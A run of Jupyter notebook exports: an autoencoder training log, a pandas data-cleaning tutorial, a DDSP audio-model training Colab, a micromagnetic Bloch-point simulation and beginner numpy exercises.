0.1105 Epoch 27/100 227/235 [===========================>..] - ETA: 0s - loss: 0.1094 Epoch 00027: val_loss improved from 0.10948 to 0.10876, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1094 - val_loss: 0.1088 Epoch 28/100 226/235 [===========================>..] - ETA: 0s - loss: 0.1091 Epoch 00028: val_loss did not improve from 0.10876 235/235 [==============================] - 1s 6ms/step - loss: 0.1091 - val_loss: 0.1093 Epoch 29/100 235/235 [==============================] - ETA: 0s - loss: 0.1088 Epoch 00029: val_loss improved from 0.10876 to 0.10870, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1088 - val_loss: 0.1087 Epoch 30/100 231/235 [============================>.] - ETA: 0s - loss: 0.1085 Epoch 00030: val_loss improved from 0.10870 to 0.10839, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1085 - val_loss: 0.1084 Epoch 31/100 228/235 [============================>.] - ETA: 0s - loss: 0.1082 Epoch 00031: val_loss did not improve from 0.10839 235/235 [==============================] - 1s 6ms/step - loss: 0.1082 - val_loss: 0.1098 Epoch 32/100 232/235 [============================>.] - ETA: 0s - loss: 0.1079 Epoch 00032: val_loss did not improve from 0.10839 235/235 [==============================] - 1s 6ms/step - loss: 0.1079 - val_loss: 0.1084 Epoch 33/100 229/235 [============================>.] - ETA: 0s - loss: 0.1076 Epoch 00033: val_loss improved from 0.10839 to 0.10712, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1077 - val_loss: 0.1071 ###Markdown Sample and Display Images ###Code images, labels = next(iter(ds_test)) autoencoder.model = load_model(model_path) outputs = autoencoder.model.predict(images) # Display grid_col = 10 grid_row = 2 f, axarr = plt.subplots(grid_row, grid_col, figsize=(grid_col*1.1, grid_row)) i = 0 for row in range(0, grid_row, 2): for col in range(grid_col): axarr[row,col].imshow(images[i,:,:,0], cmap='gray') axarr[row,col].axis('off') axarr[row+1,col].imshow(outputs[i,:,:,0], cmap='gray') axarr[row+1,col].axis('off') i += 1 f.tight_layout(0.1, h_pad=0.2, w_pad=0.1) plt.show() ###Output _____no_output_____ ###Markdown Set z_dim = 2 and to look at the latent variables ###Code autoencoder_2 = Autoencoder(z_dim=2) early = EarlyStopping(monitor= "val_loss", mode= "auto", patience = 5) callbacks_list = [early] autoencoder_2.model.compile( loss = "bce", optimizer=tf.keras.optimizers.RMSprop(learning_rate=1e-3)) autoencoder_2.model.fit(ds_train, validation_data=ds_test, epochs = 50, callbacks = callbacks_list) images, labels = next(iter(ds_test_label)) outputs = autoencoder_2.encoder.predict(images) plt.figure(figsize=(8,8)) plt.scatter(outputs[:,0], outputs[:,1], c=labels, cmap='RdYlBu', s=3) plt.colorbar() z_samples = np.array([[z1, z2] for z2 in np.arange(-5, 5, 1.) for z1 in np.arange(-5, 5, 1.)]) images = autoencoder_2.decoder.predict(z_samples) grid_col = 10 grid_row = 10 f, axarr = plt.subplots(grid_row, grid_col, figsize=(grid_col, grid_row)) i = 0 for row in range(grid_row): for col in range(grid_col): axarr[row,col].imshow(images[i,:,:,0], cmap='gray') axarr[row,col].axis('off') i += 1 f.tight_layout(0.1, h_pad=0.2, w_pad=0.1) plt.show() import ipywidgets as widgets from ipywidgets import interact, interact_manual @interact def explore_latent_variable(z1 = (-5,5,0.1), z2 = (-5,5,0.1)): z_samples = [[z1, z2]] images = autoencoder_2.decoder.predict(z_samples) plt.figure(figsize=(2,2)) plt.imshow(images[0,:,:,0], cmap='gray') ###Output _____no_output_____
book/2-pandas-datacleaning.ipynb
###Markdown Data Cleaning with Pandas====================== Overview Questions What does 'clean data' mean? How can I drop unnecessary data from my dataframe? How can I change column or row names in a dataframe? How can I cast columns to the correct data type? Objectives: Use pandas to drop unnecessary data from our dataframe. Learn how to rename pandas columns. Use pandas string methods to correct characters. Learn how to cast columns to the correct data type. Keypoints: Data cleaning prepares data for analysis. Pandas has built-in methods for handling data cleaning, particular missing data. In this section, we'll read in the data we extracted in the last lesson. You may have noticed in the last session that the data in these dataframes didn't look great. There were columns that appeared to have no values. Once we start working with the data, we are going to see some additional problems. ###Code import os import pandas as pd fpath = os.path.join("data", "potts_table1.csv") fpath2 = os.path.join("data", "potts_table2.csv") table1 = pd.read_csv(fpath) table2 = pd.read_csv(fpath2) table1.head() ###Output _____no_output_____ ###Markdown Dropping unneccessary dataIn some cases, we might have data in our dataframe that we don't need. We will want to discard or "drop" this data from the dataframe. For the dataframe we just loaded, for example, we can see that the data in columns 0, 1, 4, 12 appear to not have any values.Check your understanding What pandas method can you use to see how many non-null values you have in each column? ```{admonition} Solution:class: dropdown```pythontable1.info()``` There are two methods you might use to drop data from a dataframe. These are `drop`, and `dropna`. Drop is used when you have specific rows or columns you want to remove from the dataframe, while `dropna` is used when you want to drop columns or rows which contain `NaN` or "not a number" values. This occurs when there are no values in a data cell.In the output of `info` above, we can see that there are two columns which contain 0 non-null values. This means that all of the values in these columns are `NaN`. We can safely discard these columns. We'll use the `dropna` function to get rid of them. ###Code help(table1.dropna) ###Output Help on method dropna in module pandas.core.frame: dropna(axis=0, how='any', thresh=None, subset=None, inplace=False) method of pandas.core.frame.DataFrame instance Remove missing values. See the :ref:`User Guide <missing_data>` for more on which values are considered missing, and how to work with missing data. Parameters ---------- axis : {0 or 'index', 1 or 'columns'}, default 0 Determine if rows or columns which contain missing values are removed. * 0, or 'index' : Drop rows which contain missing values. * 1, or 'columns' : Drop columns which contain missing value. .. versionchanged:: 1.0.0 Pass tuple or list to drop on multiple axes. Only a single axis is allowed. how : {'any', 'all'}, default 'any' Determine if row or column is removed from DataFrame, when we have at least one NA or all NA. * 'any' : If any NA values are present, drop that row or column. * 'all' : If all values are NA, drop that row or column. thresh : int, optional Require that many non-NA values. subset : array-like, optional Labels along other axis to consider, e.g. if you are dropping rows these would be a list of columns to include. inplace : bool, default False If True, do operation inplace and return None. Returns ------- DataFrame or None DataFrame with NA entries dropped from it or None if ``inplace=True``. See Also -------- DataFrame.isna: Indicate missing values. DataFrame.notna : Indicate existing (non-missing) values. DataFrame.fillna : Replace missing values. Series.dropna : Drop missing values. Index.dropna : Drop missing indices. Examples -------- >>> df = pd.DataFrame({"name": ['Alfred', 'Batman', 'Catwoman'], ... "toy": [np.nan, 'Batmobile', 'Bullwhip'], ... "born": [pd.NaT, pd.Timestamp("1940-04-25"), ... pd.NaT]}) >>> df name toy born 0 Alfred NaN NaT 1 Batman Batmobile 1940-04-25 2 Catwoman Bullwhip NaT Drop the rows where at least one element is missing. >>> df.dropna() name toy born 1 Batman Batmobile 1940-04-25 Drop the columns where at least one element is missing. >>> df.dropna(axis='columns') name 0 Alfred 1 Batman 2 Catwoman Drop the rows where all elements are missing. >>> df.dropna(how='all') name toy born 0 Alfred NaN NaT 1 Batman Batmobile 1940-04-25 2 Catwoman Bullwhip NaT Keep only the rows with at least 2 non-NA values. >>> df.dropna(thresh=2) name toy born 1 Batman Batmobile 1940-04-25 2 Catwoman Bullwhip NaT Define in which columns to look for missing values. >>> df.dropna(subset=['name', 'toy']) name toy born 1 Batman Batmobile 1940-04-25 2 Catwoman Bullwhip NaT Keep the DataFrame with valid entries in the same variable. >>> df.dropna(inplace=True) >>> df name toy born 1 Batman Batmobile 1940-04-25 ###Markdown Before saving the dataframe, we'll look at and and discuss output from this function. By default, the function `dropna` will work on `axis 0` or the rows of the dataframe, and will drop any row which contains a `NaN`. You will see this results in a dataframe with no data. ###Code table1.dropna() ###Output _____no_output_____ ###Markdown Notice that `dropna` returns a dataframe and does not overwrite the original. ###Code table1.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 37 entries, 0 to 36 Data columns (total 14 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 Unnamed: 0 37 non-null int64 1 Unnamed: 0.1 1 non-null object 2 Compound 37 non-null object 3 log P 37 non-null object 4 Unnamed: 1 0 non-null float64 5 II 37 non-null float64 6 Hy 37 non-null float64 7 H, 37 non-null float64 8 MV 37 non-null object 9 R, 37 non-null float64 10 log Kou 37 non-null object 11 log Kyex 31 non-null object 12 Unnamed: 2 0 non-null float64 13 log Kpep 25 non-null object dtypes: float64(6), int64(1), object(7) memory usage: 4.2+ KB ###Markdown We can switch to dropping columns which have `NaN` values by adding the argument `axis=1`. ###Code table1.dropna(axis=1).info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 37 entries, 0 to 36 Data columns (total 9 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 Unnamed: 0 37 non-null int64 1 Compound 37 non-null object 2 log P 37 non-null object 3 II 37 non-null float64 4 Hy 37 non-null float64 5 H, 37 non-null float64 6 MV 37 non-null object 7 R, 37 non-null float64 8 log Kou 37 non-null object dtypes: float64(4), int64(1), object(4) memory usage: 2.7+ KB ###Markdown This is closer to what we want. However, you'll notice that this has dropped some columns which have data. By default, pandas will drop a column which contains **any** `NaN` values. This may not be what we want in many cases because some values may simply be missing rather than incorrect.We can add an additional argument, `how=all`, to drop only columns whose values are **all** `NaN`. By default, this function argument is `how=any`. Once we are sure we would like to keep this as our dataframe, we can add `inplace=True` to the function call to overwrite the dataframe. ###Code table1.dropna(axis=1, how="all") ###Output _____no_output_____ ###Markdown The output above looks like something to keep, so we will add `inplace=True` to overwrite the original dataframe. ###Code table1.dropna(axis=1, how="all", inplace=True) table1.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 37 entries, 0 to 36 Data columns (total 12 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 Unnamed: 0 37 non-null int64 1 Unnamed: 0.1 1 non-null object 2 Compound 37 non-null object 3 log P 37 non-null object 4 II 37 non-null float64 5 Hy 37 non-null float64 6 H, 37 non-null float64 7 MV 37 non-null object 8 R, 37 non-null float64 9 log Kou 37 non-null object 10 log Kyex 31 non-null object 11 log Kpep 25 non-null object dtypes: float64(4), int64(1), object(7) memory usage: 3.6+ KB ###Markdown We can drop the final two columns using the `drop` function. You can use this when you have specific rows or columns you would like to discard. Again, we use `axis=1` to drop columns, then we pass the column name. ###Code table1.drop(axis=1, columns=["Unnamed: 0.1", "Unnamed: 0"], inplace=True) ###Output _____no_output_____ ###Markdown Changing column namesOur column names are still incorrect. You will likely want to change them to make the table more legible. ###Code table1.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 37 entries, 0 to 36 Data columns (total 10 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 Compound 37 non-null object 1 log P 37 non-null object 2 II 37 non-null float64 3 Hy 37 non-null float64 4 H, 37 non-null float64 5 MV 37 non-null object 6 R, 37 non-null float64 7 log Kou 37 non-null object 8 log Kyex 31 non-null object 9 log Kpep 25 non-null object dtypes: float64(4), object(6) memory usage: 3.0+ KB ###Markdown We might now want to clean up the column names and make sure they are descriptive. You can see the column names using `table1.columns`. You can either rename the columns by setting `table1.columns` to a list of the appropriate length, or you can use `table1.rename`. In the `.rename` method, you put the argument `columns` and set it equal to a dictionary (curly brackets) where you use the syntax```python"current_column_name": "new_column_name"``` ###Code table1.columns table1.rename(inplace=True, columns={ "II": "pi", "Hy": "Hd", "H,": "Ha", "R,": "R_2", "log Kou": "log K_oct", "log Kyex": "log K_hex", "log Kpep": "log K_hep" }) table1.head() ###Output _____no_output_____ ###Markdown Fixing Data Types When examining `.info` , you'll notice that a lot of our columns which should be numbers are still 'objects' or strings. We would like `log P`, for example to be numeric. Typically if a column appears that it should be numeric, but pandas does not automatically cast it as such, it is because there are some non-numeric characters in the column which pandas could not decide what to do with. We will need to examine these, decide what to do with them, then cast the column as numeric.There are a few ways to do this, but we'll use the pandas function `to_numeric`. ###Code table1.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 37 entries, 0 to 36 Data columns (total 10 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 Compound 37 non-null object 1 log P 37 non-null object 2 pi 37 non-null float64 3 Hd 37 non-null float64 4 Ha 37 non-null float64 5 MV 37 non-null object 6 R_2 37 non-null float64 7 log K_oct 37 non-null object 8 log K_hex 31 non-null object 9 log K_hep 25 non-null object dtypes: float64(4), object(6) memory usage: 3.0+ KB ###Markdown Using the `to_numeric` function without any additional inputs will fail on this data set. ###Code pd.to_numeric(table1["log P"]) ###Output _____no_output_____ ###Markdown Scrolling to the bottom of this message and reading the error, you will see it is having a problem reading the value `"— 6.85"`. It may not seem obvious what this problem is at first. When we run into a problem like this we have a few options. You could choose to handle the errors differently. Pandas will let you set what you would like for it to do when it is unable to cast a value. By default, it will fail (which is what se wee above). For example, you could also set errors to be ignored (which would result in the column being unchanged, there would just be no error raised) or to "coerce" the values. Choosing "coerce" means that anything that can't be cast as numeric will be put as `NaN`.Let's see what happens when we set errors to coerce. ###Code pd.to_numeric(table1["log P"], errors="coerce") ###Output _____no_output_____ ###Markdown This unfortunately results in no numeric characters being recognized.We have to do a little bit more processing to the values for this to work. If you examine the columns, you may notice that the negative sign is a little off. It is `—` when it should be `-`. This is very slight, and might be hard to see, but it is important to change for this data set.We will want to replace all `—` with `-`. We could accomplish this using the string method `replace`. Strings in Python have a number of methods. The `replace` method allows us to replace a substring within a string. ###Code test_string = "Hello world." test_string.replace(".", "!") ###Output _____no_output_____ ###Markdown The split command is another string method you are probably familiar with: ###Code test_string.split() ###Output _____no_output_____ ###Markdown Pandas string methods If we want to use these on a column in a pandas dataframe, you might think to use `apply`, which we learned about in the last session. However, you will notice that the `replace` method acts on a the string and doesn't fit into `apply`.Luckily, when pandas columns are strings, we can use string methods on the whole column by adding `.str.function`. For example, to replace the minus signs ###Code table1["log P"].str.replace("—", "-") table1["log P"] = table1["log P"].str.replace("—", "-") # We still need to get rid of spaces table1["log P"] = table1["log P"].str.replace(" ", "") table1["log P"] = pd.to_numeric(table1["log P"], errors="coerce") table1.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 37 entries, 0 to 36 Data columns (total 10 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 Compound 37 non-null object 1 log P 34 non-null float64 2 pi 37 non-null float64 3 Hd 37 non-null float64 4 Ha 37 non-null float64 5 MV 37 non-null object 6 R_2 37 non-null float64 7 log K_oct 37 non-null object 8 log K_hex 31 non-null object 9 log K_hep 25 non-null object dtypes: float64(5), object(5) memory usage: 3.0+ KB ###Markdown We actually need to change this character on all of our columns. However `str` methods only work on pandas series. If we want to replace a string across all of our DataFrame, we will use the `.replace` method. In order for it to recognize substrings, set the option `regex=True`. We will discuss `regex` more in the next session, but this is all you need to know about regex for the moment. ###Code table1.replace("—", "-", regex=True, inplace=True) table1.replace(" ", "", regex=True, inplace=True) ###Output _____no_output_____ ###Markdown Changing the data type of multiple columns To change the data type of multiple columns, we will want to use the `pd.to_numeric` function on all of those columns. There are several ways you might choose to do this. For example, you might just choose to call the function for each column.We can also accomplish this by using the `apply` operator which we learned about in the last session. The `apply` operator should be used whenever you want to apply a function to a row or column. In this case, we want to apply the `pd.to_numeric` function to each column.Because we want to apply to the columns, we add the argument `axis=1`. ###Code table1.apply(pd.to_numeric, axis=1) ###Output _____no_output_____ ###Markdown When we try this code, we immediately see an error. We do not want to try to convert the first column to a number. We can use the `iloc` function to exclude the first column: ###Code table1.iloc[:, 1:].apply(pd.to_numeric, axis=1) ###Output _____no_output_____ ###Markdown An error again! This time, we see failure because a string was incorrectly read from the pdf and could not be converted to a number. You could choose to handle this differently, but for this workshop we are just going to discard values like these. If we were using `to_numeric` on a pandas series, we would use the option `errors="coerce"`. You may not see immediately how to use this with the `apply` function, but fortunately, pandas allows us to pass additional arguments with `apply`: ###Code table1.iloc[:, 1:] = table1.iloc[:, 1:].apply(pd.to_numeric, axis=1, errors="coerce") table1.info() table1.to_csv("data/potts_table1_clean.csv", index=False) ###Output _____no_output_____
ddsp/colab/demos/.ipynb_checkpoints/train_autoencoder-checkpoint.ipynb
###Markdown Copyright 2020 Google LLC.Licensed under the Apache License, Version 2.0 (the "License"); ###Code # Copyright 2020 Google LLC. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== ###Output _____no_output_____ ###Markdown Train a DDSP Autoencoder on GPUThis notebook demonstrates how to install the DDSP library and train it for synthesis based on your own data using our command-line scripts. If run inside of Colab, it will automatically use a free Google Cloud GPU.At the end, you'll have a custom-trained checkpoint that you can download to use with the [DDSP Timbre Transfer Colab](https://colab.research.google.com/github/magenta/ddsp/blob/master/ddsp/colab/demos/timbre_transfer.ipynb). **Note that we prefix bash commands with a `!` inside of Colab, but you would leave them out if running directly in a terminal.** Install DependenciesFirst we install the required dependencies with `pip`. ###Code %tensorflow_version 2.x !pip install -qU ddsp[data_preparation] # Initialize global path for using google drive. DRIVE_DIR = '' ###Output _____no_output_____ ###Markdown Setup Google Drive (Optional, Recommeded)This notebook requires uploading audio and saving checkpoints. While you can do this with direct uploads / downloads, it is recommended to connect to your google drive account. This will enable faster file transfer, and regular saving of checkpoints so that you do not lose your work if the colab kernel restarts (common for training more than 12 hours). Login and mount your driveThis will require an authentication code. You should then be able to see your drive in the file browser on the left panel. ###Code from google.colab import drive drive.mount('/content/drive') ###Output _____no_output_____ ###Markdown Set your base directory* In drive, put all of the audio (.wav, .mp3) files with which you would like to train in a single folder. * Typically works well with 10-20 minutes of audio from a single monophonic source (also, one acoustic environment). * Use the file browser in the left panel to find a folder with your audio, right-click **"Copy Path", paste below**, and run the cell. ###Code #@markdown (ex. `/content/drive/My Drive/...`) Leave blank to skip loading from Drive. DRIVE_DIR = '' #@param {type: "string"} import os assert os.path.exists(DRIVE_DIR) print('Drive Folder Exists:', DRIVE_DIR) ###Output _____no_output_____ ###Markdown Make directories to save model and data ###Code AUDIO_DIR = 'data/audio' AUDIO_FILEPATTERN = AUDIO_DIR + '/*' !mkdir -p $AUDIO_DIR if DRIVE_DIR: SAVE_DIR = os.path.join(DRIVE_DIR, 'ddsp-solo-instrument') else: SAVE_DIR = '/content/models/ddsp-solo-instrument' !mkdir -p "$SAVE_DIR" ###Output _____no_output_____ ###Markdown Prepare Dataset Upload training audioUpload audio files to use for training your model. Uses `DRIVE_DIR` if connected to drive, otherwise prompts local upload. ###Code import glob import os from ddsp.colab import colab_utils if DRIVE_DIR: mp3_files = glob.glob(os.path.join(DRIVE_DIR, '*.mp3')) wav_files = glob.glob(os.path.join(DRIVE_DIR, '*.wav')) audio_files = mp3_files + wav_files else: audio_files, _ = colab_utils.upload() for fname in audio_files: target_name = os.path.join(AUDIO_DIR, os.path.basename(fname).replace(' ', '_')) print('Copying {} to {}'.format(fname, target_name)) !cp "$fname" $target_name ###Output _____no_output_____ ###Markdown Preprocess raw audio into TFRecord datasetWe need to do some preprocessing on the raw audio you uploaded to get it into the correct format for training. This involves turning the full audio into short (4-second) examples, inferring the fundamental frequency (or "pitch") with [CREPE](http://github.com/marl/crepe), and computing the loudness. These features will then be stored in a sharded [TFRecord](https://www.tensorflow.org/tutorials/load_data/tfrecord) file for easier loading. Depending on the amount of input audio, this process usually takes a few minutes.* (Optional) Transfer dataset from drive. If you've already created a dataset, from a previous run, this cell will skip the dataset creation step and copy the dataset from `$DRIVE_DIR/data` ###Code import glob import os TRAIN_TFRECORD = 'data/train.tfrecord' TRAIN_TFRECORD_FILEPATTERN = TRAIN_TFRECORD + '*' # Copy dataset from drive if dataset has already been created. drive_data_dir = os.path.join(DRIVE_DIR, 'data') drive_dataset_files = glob.glob(drive_data_dir + '/*') if DRIVE_DIR and len(drive_dataset_files) > 0: !cp "$drive_data_dir"/* data/ else: # Make a new dataset. if not glob.glob(AUDIO_FILEPATTERN): raise ValueError('No audio files found. Please use the previous cell to ' 'upload.') !ddsp_prepare_tfrecord \ --input_audio_filepatterns=$AUDIO_FILEPATTERN \ --output_tfrecord_path=$TRAIN_TFRECORD \ --num_shards=10 \ --alsologtostderr # Copy dataset to drive for safe-keeping. if DRIVE_DIR: !mkdir "$drive_data_dir"/ print('Saving to {}'.format(drive_data_dir)) !cp $TRAIN_TFRECORD_FILEPATTERN "$drive_data_dir"/ ###Output _____no_output_____ ###Markdown Save dataset statistics for timbre transferQuantile normalization helps match loudness of timbre transfer inputs to the loudness of the dataset, so let's calculate it here and save in a pickle file. ###Code from ddsp.colab import colab_utils import ddsp.training data_provider = ddsp.training.data.TFRecordProvider(TRAIN_TFRECORD_FILEPATTERN) dataset = data_provider.get_dataset(shuffle=False) PICKLE_FILE_PATH = os.path.join(SAVE_DIR, 'dataset_statistics.pkl') colab_utils.save_dataset_statistics(data_provider, PICKLE_FILE_PATH) ###Output _____no_output_____ ###Markdown Let's load the dataset in the `ddsp` library and have a look at one of the examples. ###Code from ddsp.colab import colab_utils import ddsp.training from matplotlib import pyplot as plt import numpy as np data_provider = ddsp.training.data.TFRecordProvider(TRAIN_TFRECORD_FILEPATTERN) dataset = data_provider.get_dataset(shuffle=False) try: ex = next(iter(dataset)) except StopIteration: raise ValueError( 'TFRecord contains no examples. Please try re-running the pipeline with ' 'different audio file(s).') colab_utils.specplot(ex['audio']) colab_utils.play(ex['audio']) f, ax = plt.subplots(3, 1, figsize=(14, 4)) x = np.linspace(0, 4.0, 1000) ax[0].set_ylabel('loudness_db') ax[0].plot(x, ex['loudness_db']) ax[1].set_ylabel('F0_Hz') ax[1].set_xlabel('seconds') ax[1].plot(x, ex['f0_hz']) ax[2].set_ylabel('F0_confidence') ax[2].set_xlabel('seconds') ax[2].plot(x, ex['f0_confidence']) ###Output _____no_output_____ ###Markdown Train ModelWe will now train a "solo instrument" model. This means the model is conditioned only on the fundamental frequency (f0) and loudness with no instrument ID or latent timbre feature. If you uploaded audio of multiple instruemnts, the neural network you train will attempt to model all timbres, but will likely associate certain timbres with different f0 and loudness conditions. First, let's start up a [TensorBoard](https://www.tensorflow.org/tensorboard) to monitor our loss as training proceeds. Initially, TensorBoard will report `No dashboards are active for the current data set.`, but once training begins, the dashboards should appear. ###Code %reload_ext tensorboard import tensorboard as tb tb.notebook.start('--logdir "{}"'.format(SAVE_DIR)) ###Output _____no_output_____ ###Markdown We will now begin training. Note that we specify [gin configuration](https://github.com/google/gin-config) files for the both the model architecture ([solo_instrument.gin](TODO)) and the dataset ([tfrecord.gin](TODO)), which are both predefined in the library. You could also create your own. We then override some of the spefic params for `batch_size` (which is defined in in the model gin file) and the tfrecord path (which is defined in the dataset file). Training Notes:* Models typically perform well when the loss drops to the range of ~4.5-5.0.* Depending on the dataset this can take anywhere from 5k-30k training steps usually.* The default is set to 30k, but you can stop training at any time, and for timbre transfer, it's best to stop before the loss drops too far below ~5.0 to avoid overfitting.* On the colab GPU, this can take from around 3-20 hours. * We **highly recommend** saving checkpoints directly to your drive account as colab will restart naturally after about 12 hours and you may lose all of your checkpoints.* By default, checkpoints will be saved every 300 steps with a maximum of 10 checkpoints (at ~60MB/checkpoint this is ~600MB). Feel free to adjust these numbers depending on the frequency of saves you would like and space on your drive.* If you're restarting a session and `DRIVE_DIR` points a directory that was previously used for training, training should resume at the last checkpoint. ###Code !ddsp_run \ --mode=train \ --alsologtostderr \ --save_dir="$SAVE_DIR" \ --gin_file=models/solo_instrument.gin \ --gin_file=datasets/tfrecord.gin \ --gin_param="TFRecordProvider.file_pattern='$TRAIN_TFRECORD_FILEPATTERN'" \ --gin_param="batch_size=16" \ --gin_param="train_util.train.num_steps=30000" \ --gin_param="train_util.train.steps_per_save=300" \ --gin_param="trainers.Trainer.checkpoints_to_keep=10" ###Output _____no_output_____ ###Markdown ResynthesisCheck how well the model reconstructs the training data ###Code from ddsp.colab.colab_utils import play, specplot import ddsp.training import gin from matplotlib import pyplot as plt import numpy as np data_provider = ddsp.training.data.TFRecordProvider(TRAIN_TFRECORD_FILEPATTERN) dataset = data_provider.get_batch(batch_size=1, shuffle=False) try: batch = next(iter(dataset)) except OutOfRangeError: raise ValueError( 'TFRecord contains no examples. Please try re-running the pipeline with ' 'different audio file(s).') # Parse the gin config. gin_file = os.path.join(SAVE_DIR, 'operative_config-0.gin') gin.parse_config_file(gin_file) # Load model model = ddsp.training.models.Autoencoder() model.restore(SAVE_DIR) # Resynthesize audio. audio_gen = model(batch, training=False) audio = batch['audio'] print('Original Audio') specplot(audio) play(audio) print('Resynthesis') specplot(audio_gen) play(audio_gen) ###Output _____no_output_____ ###Markdown Download CheckpointBelow you can download the final checkpoint. You are now ready to use it in the [DDSP Timbre Tranfer Colab](https://colab.research.google.com/github/magenta/ddsp/blob/master/ddsp/colab/demos/timbre_transfer.ipynb). ###Code from ddsp.colab import colab_utils import tensorflow as tf import os CHECKPOINT_ZIP = 'my_solo_instrument.zip' latest_checkpoint_fname = os.path.basename(tf.train.latest_checkpoint(SAVE_DIR)) !cd "$SAVE_DIR" && zip $CHECKPOINT_ZIP $latest_checkpoint_fname* operative_config-0.gin dataset_statistics.pkl !cp "$SAVE_DIR/$CHECKPOINT_ZIP" ./ colab_utils.download(CHECKPOINT_ZIP) ###Output _____no_output_____
examples/spatially-varying-parameters2.ipynb
###Markdown Spatially varying parameters 2In this notebook, one data point from Figure 2 in [Beg *et al.* Stable and manipulable Bloch point. *Scientific Reports*, **9**, 7959 (2019)](https://doi.org/10.1038/s41598-019-44462-2) is simulated.We need to relax a $150 \,\text{nm}$ disk, which consists of two layers with different sign of Dzyaloshinskii-Moriya constant $D$. The bottom layer with $D0$ has $10 \,\text{nm}$ thickness. We start by importing the necessary modules and creating the mesh with two regions. ###Code import oommfc as mc import discretisedfield as df import micromagneticmodel as mm d = 150e-9 hb = 20e-9 ht = 10e-9 cell = (5e-9, 5e-9, 2.5e-9) subregions = {'r1': df.Region(p1=(-d/2, -d/2, -hb), p2=(d/2, d/2, 0)), 'r2': df.Region(p1=(-d/2, -d/2, 0), p2=(d/2, d/2, ht))} p1 = (-d/2, -d/2, -hb) p2 = (d/2, d/2, ht) mesh = df.Mesh(p1=p1, p2=p2, cell=cell, subregions=subregions) ###Output _____no_output_____ ###Markdown The mesh domain and the discretisation cells are: ###Code mesh.k3d() ###Output _____no_output_____ ###Markdown and the two regions we defined are: ###Code mesh.k3d_subregions() ###Output _____no_output_____ ###Markdown Now, we need to define the system object, and by setting magnetisation saturation, set the geometry to be a disk. ###Code system = mm.System(name='bloch_point') D = {'r1': 1.58e-3, 'r2': -1.58e-3, 'r1:r2': 1.58e-9} Ms = 3.84e5 A = 8.78e-12 def Ms_fun(point): x, y, z = point if x**2 + y**2 <= (d/2)**2: return Ms else: return 0 system.energy = mm.Exchange(A=A) + mm.DMI(D=D, crystalclass='T') + mm.Demag() system.m = df.Field(mesh, dim=3, value=(0, 0, 1), norm=Ms_fun) ###Output _____no_output_____ ###Markdown Our sample is now: ###Code system.m.norm.k3d.nonzero() ###Output _____no_output_____ ###Markdown Now, we can minimise the system's energy by using `MinDriver`. ###Code md = mc.MinDriver() md.drive(system) ###Output Running OOMMF (ExeOOMMFRunner)[2022/02/25 18:18]... (2.3 s) ###Markdown The out-of-plane magnetisation component ($m_{z}$) is now: ###Code system.m.z.k3d.scalar(filter_field=system.m.norm) ###Output _____no_output_____ ###Markdown We can see that two vortices with different orientation emerged. We can inspect this closer by plotting two layers of magnetisation in two different layers: ###Code import k3d plot = k3d.plot() system.m.plane(z=-10e-9, n=(20, 20)).k3d.vector(plot=plot, color_field=system.m.z, head_size=30) system.m.plane(z=5e-9, n=(20, 20)).k3d.vector(plot=plot,color_field=system.m.z, head_size=30) plot.display() ###Output _____no_output_____ ###Markdown We can now plot another cross section and see that the Bloch point emerged. ###Code @df.interact(y=system.m.mesh.slider('y', continuous_update=False)) def my_plot(y): system.m.plane(y=y).mpl(figsize=(10, 5), vector_kw={'scale': 1e7}) ###Output _____no_output_____
Abanoub.ipynb
###Markdown ###Code import numpy as np print("Hello Mr.Abanoub") !pip install numpy x=np.my_array=([5, 9, 10, 18, 122, 14, 77]) print(x) print(x[1:3]) print(x[2:7]) y=np.my_array=([[8, 8, 2, 11, 44, 99, 5],[8, 7, 1, 0, 22, 66, 8]]) print(y) print(y[0:5]) print(y[0:3]) import numpy as np Random=np.random.random((3,3)) print(Random) print(Random[0:3]) import numpy as np Zero= np.zeros([3,3]) print(Zero) print("Yes") import numpy as np Pop=np.ones([4,4]) print(Pop) import numpy as np Abanoub = np. full((5,5),8) print(Abanoub) import numpy as np ident=np.eye(2,2) print(ident) import numpy as np x=np.array=([[5, 10, 10, 20, 25, 30],[25, 45, 60, 55, 80, 99]]) y=np.array=([[2, 3, 8, 9, 5, 7],[8, 4, 2, 1, 3, 6]]) print(x) print(y) print(np.add(x,y)) print(np.subtract(x,y)) print(np.divide(y,x)) print(np.multiply(x,y)) print(np.sqrt((x))) print(x) x_new=np.sqrt(x) y_new=np.divide(x,y) print(x_new) print(y_new) z=np.multiply(x_new,y_new) print(z) import numpy as np #Define an array of np's My_Array= np.array=([10, 5, 9, 7]) print(My_Array) print(type(My_Array)) print(My_Array.count) print(My_Array[0]) My_Array[2]=80 print(My_Array[2]) print(My_Array[3]) import numpy as np arr=np.array=([[5,6],[2, 4]]) v=np.array=([[5, 2],[3, 5, 9]]) print(v) ###Output [[5, 2], [3, 5, 9]]
DV - Data Visualizations with Plotly/02.Using Scenarios with Plotly/02.02.Plotly Express vs Graph_Objects.ipynb
